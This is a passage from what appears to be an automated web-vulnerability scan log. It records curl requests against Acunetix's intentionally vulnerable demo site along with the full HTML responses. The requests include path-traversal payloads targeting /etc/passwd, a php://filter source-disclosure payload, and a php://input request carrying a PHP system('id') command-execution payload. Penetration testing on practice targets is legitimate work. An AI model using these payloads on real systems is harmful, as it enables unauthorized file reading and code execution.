classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:45.564749"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/index.php?page=../../../etc/passwd\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/index.php?page=../../../etc/passwd\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id=\"pageName\">welcome to our page</h2>\n\t <div class=\"story\">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | <a href=\"/Mod_Rewrite_Shop/\">Shop</a> | <a href=\"/hpp/\">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:46.001266"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/index.php?file=php://filter/convert.base64-encode/resource=index.php\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/index.php?file=php://filter/convert.base64-encode/resource=index.php\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id=\"pageName\">welcome to our page</h2>\n\t <div class=\"story\">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | <a href=\"/Mod_Rewrite_Shop/\">Shop</a> | <a href=\"/hpp/\">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:46.434820"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=../../../etc/passwd%00\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=../../../etc/passwd%00\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>picture categories</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id=\"pageName\">categories</h2>\n\t<div class='story'><a href='listproducts.php?cat=1'><h3>Posters</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div><div class='story'><a href='listproducts.php?cat=2'><h3>Paintings</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div><div class='story'><a href='listproducts.php?cat=3'><h3>Stickers</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div><div class='story'><a href='listproducts.php?cat=4'><h3>Graffity</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div></div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:46.874506"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=php://input\" -d \"<?php system('id'); ?>\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=php://input\" -d \"<?php system('id'); ?>\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>artists</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\tError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://input' at line 1",
"timestamp": "2026-01-09T22:29:47.314234"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/userinfo.php?id=1\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/userinfo.php?id=1\"",
"success": true,
"output": "you must login",
"timestamp": "2026-01-09T22:29:47.755616"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/userinfo.php?id=2\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/userinfo.php?id=2\"",
"success": true,
"output": "you must login",
"timestamp": "2026-01-09T22:29:48.197967"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/userinfo.php?id=999\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/userinfo.php?id=999\"",
"success": true,
"output": "you must login",
"timestamp": "2026-01-09T22:29:48.644941"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/cart.php?id=1\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/cart.php?id=1\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>you cart</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t\n\t\t\t<h2 id='pageName'>Error</h2>\n\t\t\t <div class='story'>\n\t\t\t\t<p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p>\n\t\t\t </div>\n\t\t\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:49.088802"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/cart.php?action=view&id=../../../etc/passwd\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/cart.php?action=view&id=../../../etc/passwd\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>you cart</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a 